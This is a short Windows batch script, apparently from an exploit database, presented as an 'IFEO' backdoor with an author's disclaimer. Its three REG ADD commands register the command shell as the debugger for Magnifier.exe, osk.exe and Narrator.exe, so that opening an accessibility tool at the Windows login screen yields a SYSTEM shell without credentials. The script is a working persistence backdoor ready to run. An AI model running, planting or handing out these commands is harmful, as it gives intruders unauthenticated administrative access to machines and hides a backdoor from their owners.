@ECHO OFF REM Microsoft Windows 'IFEO' Winlogin SYSTEM Backdooring Exploit REM REM Todor Donev REM https://www.ethical-hacker.org/ REM https://www.facebook.com/ethicalhackerorg REM REM https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ REM REM Disclaimer: REM This or previous programs is for Educational purpose ONLY. Do not use it without permission. REM The usual disclaimer applies, especially the fact that Todor Donev is not liable for any REM damages caused by direct or indirect use of the information or functionality provided by these REM programs. The author or any Internet provider bears NO responsibility for content or misuse REM of these programs or any derivatives thereof. By using these programs you accept the fact REM that any damage (dataloss, system crash, system compromise, etc.) caused by the use REM of these programs is not Todor Donev's responsibility. REM REM Use them at your own risk! REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnifier.exe" /v Debugger /t REG_SZ /d "%COMSPEC%" REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "%COMSPEC%" REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v Debugger /t REG_SZ /d "%COMSPEC%" # Iranian Exploit DataBase = http://IeDb.Ir [2017-04-24]